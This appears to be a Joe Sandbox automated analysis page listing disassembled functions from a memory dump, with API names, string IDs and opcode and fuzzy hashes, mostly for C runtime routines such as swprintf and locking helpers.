                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 442e0f71d7932d6e919f2b95302216f9b2e169bd45c5a1af0ab64b4b2f9f99a7
                                                                • Instruction ID: e5763956ab1726e45d0f04b9a98bfa78fa083e16aefa0f312d57d964e7d50a52
                                                                • Opcode Fuzzy Hash: 442e0f71d7932d6e919f2b95302216f9b2e169bd45c5a1af0ab64b4b2f9f99a7
                                                                • Instruction Fuzzy Hash: B1315A39A0AA4281EA16EF55E5401B96761FF86FA1F090132DA0DC77A6DF7CFD46C320
                                                                Function 00007FF6A54D6CE8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 8fff2511940910620396665920ee95fa34a5df8c9eaa3d3847896387a02590da
                                                                • Instruction ID: 47c4f5e32a45deb27bd76a20eaddfff0cc00b1e0f08d0f1fc773eedde46cb225
                                                                • Opcode Fuzzy Hash: 8fff2511940910620396665920ee95fa34a5df8c9eaa3d3847896387a02590da
                                                                • Instruction Fuzzy Hash: 1B316126A1AA5295FF15EF55E4401BD67A1EF46FA0F180132DA0DC76A6DF7CEC82C320
                                                                Function 00007FF6A54C4B40 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: cce6341b87599b0e14eb8a872d675033d5993f91c0dac61a5f71a53fe500180e
                                                                • Instruction ID: 5f7b5359e8c4f9d656742758e2c286e4d5593b7c63a7e355c06629838d25c27b
                                                                • Opcode Fuzzy Hash: cce6341b87599b0e14eb8a872d675033d5993f91c0dac61a5f71a53fe500180e
                                                                • Instruction Fuzzy Hash: 85317035A0AA4281EA15EB55E5441B96761EF86FA0F090131DA0D876A5EF7CFC86C320
                                                                Function 00007FF6A54D6BD0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 50417b05fb83eb24c471181c41f370d196cd76f3d5177b63aae28d95052f253c
                                                                • Instruction ID: be2ace16fd61733deec93aab824f488d094220b6619c1c4beb09c8e0aa352d5e
                                                                • Opcode Fuzzy Hash: 50417b05fb83eb24c471181c41f370d196cd76f3d5177b63aae28d95052f253c
                                                                • Instruction Fuzzy Hash: 12317C36A0AA4695FF15EB55E4401B967A1FF46FA0F080532DA0D877A6DF7CEC82C320
                                                                Function 00007FF6A54DE0A8 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: b48594e765decf52db20480ba8359efc24b848fd086e7b6846042600721d5946
                                                                • Instruction ID: d9828c206d4d4bb788de910111e153dbba890382b96d3a3a21d1f2828a601abe
                                                                • Opcode Fuzzy Hash: b48594e765decf52db20480ba8359efc24b848fd086e7b6846042600721d5946
                                                                • Instruction Fuzzy Hash: 26113326B15F028AEB00DF70E8542B833A4F75AB58F440E31EA6D86764DF7CE9558340
                                                                Function 00007FF6A54E136C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: __except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 1467352782-3733052814
                                                                • Opcode ID: 295241bc3eb802bc70d13b5f8b85ab08e650c0268fa9ac1412acb549de4f6502
                                                                • Instruction ID: 33415320a0d6385042d1bdbb7a6594c66d1321e8099a5e391145bdca2c2953ba
                                                                • Opcode Fuzzy Hash: 295241bc3eb802bc70d13b5f8b85ab08e650c0268fa9ac1412acb549de4f6502
                                                                • Instruction Fuzzy Hash: AB71D172A0A68286D760DF25D4807BD7BA1EB47F89F14A132DE4E87A85CF3CD891C701
                                                                Function 00007FF6A54FAD44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                • String ID: ?
                                                                • API String ID: 1286766494-1684325040
                                                                • Opcode ID: 8ab20d3b69a48500a135df246594042954eb16e287eaf2d90c99010f7f0dc454
                                                                • Instruction ID: 2bafff9918f05a94b46821c3f79dcd8ef2096e147bb3e869bd65b96f5b902102
                                                                • Opcode Fuzzy Hash: 8ab20d3b69a48500a135df246594042954eb16e287eaf2d90c99010f7f0dc454
                                                                • Instruction Fuzzy Hash: 5F410522A0A78246FB64DB2AE44137A6661EF82FA4F144235EE5C87AD5DF3CD8458700
                                                                Function 00007FF6A54E1A04 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 2558813199-1018135373
                                                                • Opcode ID: bb78f3907c44f2a1592bb94d34b41afc7e61a7643cd4709a50f3aedc06cebf7f
                                                                • Instruction ID: 371906427998d0eca1587b6d723aa697f30d6f53a15beebc21bbc58c352102f6
                                                                • Opcode Fuzzy Hash: bb78f3907c44f2a1592bb94d34b41afc7e61a7643cd4709a50f3aedc06cebf7f
                                                                • Instruction Fuzzy Hash: 5F514C3361A74196E620DB15E14026D77E8FB8ABA4F141535EF8D87B66DF3CE861CB00
                                                                Function 00007FF6A54F8B68 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                • Opcode ID: ed11073dd472fe1d6bf60e201386ec0a16f33f873fff8700653b1833bfdf3473
                                                                • Instruction ID: b7583887cf8fc6380d824005cd9ceaa9532d08e4b7799900ecbf9776c2260d0a
                                                                • Opcode Fuzzy Hash: ed11073dd472fe1d6bf60e201386ec0a16f33f873fff8700653b1833bfdf3473
                                                                • Instruction Fuzzy Hash: 7641A46271AA8195DB20CF29E8443AA67A1FB85F94F444131EE4DCB798EF3CD845C740
                                                                Function 00007FF6A54A6FF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: type_info::_name_internal_method
                                                                • String ID: P$https
                                                                • API String ID: 3713626258-3662734162
                                                                • Opcode ID: 731a52718375062dfc645ce3eff56ac4f68a03956f433a48024afd2b9ffc264f
                                                                • Instruction ID: 84037fdcd40d625ba03282d828939e4a11aa339114449f3591a52613149a7e81
                                                                • Opcode Fuzzy Hash: 731a52718375062dfc645ce3eff56ac4f68a03956f433a48024afd2b9ffc264f
                                                                • Instruction Fuzzy Hash: C8311422A1E68185EAB0DB15F45137BA390FBC5B84F405535F68DC7B9ADF3CD9058B40
                                                                Function 00007FF6A54D42F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: 214541328d5f729f19efb773aafc6364229d09249fa7ec4ef70a7dabdd92834e
                                                                • Instruction ID: 8ec22b3d11992c0cf9d12a4368eaba7da3b60f6bb8dc413fbfb8e12a0725da67
                                                                • Opcode Fuzzy Hash: 214541328d5f729f19efb773aafc6364229d09249fa7ec4ef70a7dabdd92834e
                                                                • Instruction Fuzzy Hash: DA21C123A09BC486E7618B15E4413EEA7D1EB9AB84F588135EECC47B89DF7CD849C701
                                                                Function 00007FF6A54D43FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: cf3ead370c83b5dd9dd6760c00b6334785b01015155d8373cf9d9c6094265cd1
                                                                • Instruction ID: ccb6b893f67b7cc6ed652bb7201894325685800d7cf4b22d93a6b3e1b2a63563
                                                                • Opcode Fuzzy Hash: cf3ead370c83b5dd9dd6760c00b6334785b01015155d8373cf9d9c6094265cd1
                                                                • Instruction Fuzzy Hash: A721E363609BC486E721CB11E4003EAA791EB96B84F588035EB8C47789EF7CD849C741
                                                                Function 00007FF6A54BADE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: 878a32fafce56c8b395b74503d483490d2726d2ab9b2f90dcc8c23c1d9491d03
                                                                • Instruction ID: 698205579580f7e8997fa8ab14e4c9fcf8573f96d330510e77993ced7ffb70f5
                                                                • Opcode Fuzzy Hash: 878a32fafce56c8b395b74503d483490d2726d2ab9b2f90dcc8c23c1d9491d03
                                                                • Instruction Fuzzy Hash: FF31D1226097C185EB21DB15E4503EEBB51EB9AB84F488131DB8C47B86DF2CD808C740
                                                                Function 00007FF6A54D50A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: f7f790b15928669f63ac0b4bd1071fd05430d6de74a0598950a63e88146ec23f
                                                                • Instruction ID: ca494c6c766f883cc5c7917f5d7f552641ecccd8358d1d2cdddc1d892db75e44
                                                                • Opcode Fuzzy Hash: f7f790b15928669f63ac0b4bd1071fd05430d6de74a0598950a63e88146ec23f
                                                                • Instruction Fuzzy Hash: E021C313A09BC486E7619715E8553EEA7E1EBAAB84F548035DBCC47B89DF3CD848C701
                                                                Function 00007FF6A54D4F9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: c2cebb0d2db251b0343e21a4ec402bc5d03543fa8c884b3aae93db9ab374962e
                                                                • Instruction ID: 87c6d3e4d7fd9f66c891b9646dbbeb4d5c5acd3633f622633e5e9b4aa32f228f
                                                                • Opcode Fuzzy Hash: c2cebb0d2db251b0343e21a4ec402bc5d03543fa8c884b3aae93db9ab374962e
                                                                • Instruction Fuzzy Hash: 9821C113A09BC486E761DB15E4403EAA7D1EBAAB84F588035EB8C47B89DF7CD849C741
                                                                Function 00007FF6A54BACC8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: 78d6123ef02fb1bf05b91fda63058ecc439cceb972afb1d65488007b91d071b8
                                                                • Instruction ID: 0036bc25ce632f60f9df3ae4fa385edced900e9a2aff7bed992c1c5d00bcdb2c
                                                                • Opcode Fuzzy Hash: 78d6123ef02fb1bf05b91fda63058ecc439cceb972afb1d65488007b91d071b8
                                                                • Instruction Fuzzy Hash: 8731E32360D7C589EB21DB15E4503EEAB61EB9AB84F488031DB8C47B86DF3CD808C700
                                                                Function 00007FF6A54BA5A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: faf60231c9281e8de667494f4fdb26f10e9e1cb6ef4151b568b2444df3f7d491
                                                                • Instruction ID: 86262ec8d7b8fe2d0c7499c0a51e0fd49a8f9478403f93d5d9a4c6cb0e0d2ffd
                                                                • Opcode Fuzzy Hash: faf60231c9281e8de667494f4fdb26f10e9e1cb6ef4151b568b2444df3f7d491
                                                                • Instruction Fuzzy Hash: AB21C56260D7C585E721DB15E4503EEB7A1E79AB84F188031DACC43B8ACF3CD806CB50
                                                                Function 00007FF6A54D4884 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: f857a7e068703c22f70bc0f352c5e21d3c434051c1a161e5696b6eb9032e93f2
                                                                • Instruction ID: 98965c32d86e8a964a70ca76d72a69af6a6a616e082d2623c15a21949231ca1d
                                                                • Opcode Fuzzy Hash: f857a7e068703c22f70bc0f352c5e21d3c434051c1a161e5696b6eb9032e93f2
                                                                • Instruction Fuzzy Hash: 2B21D823A0D7C485E721C725E4007EEB791EB9AB84F548131EA8C47B89DF7CD846C750
                                                                Function 00007FF6A54BA49C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: e831e4c375957cd0e5e716f3444b2a4ed1febba7d1a1f0e2d7acaf4f82e84b1c
                                                                • Instruction ID: 9fc5094d9eaa19b54ce5233cb278ca5b1e507d942327dc1ecc7d5eb1ea2c6e4b
                                                                • Opcode Fuzzy Hash: e831e4c375957cd0e5e716f3444b2a4ed1febba7d1a1f0e2d7acaf4f82e84b1c
                                                                • Instruction Fuzzy Hash: 9321C32260D7C585E721DB19E4403EEB7A1E79AB88F588031DA8C47B8ADF3CD906C751
                                                                Function 00007FF6A54D3BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: 46e15a95bb962e2dd417d488284b3fd0ee0fd895637bd75e109c08b0388ab4dc
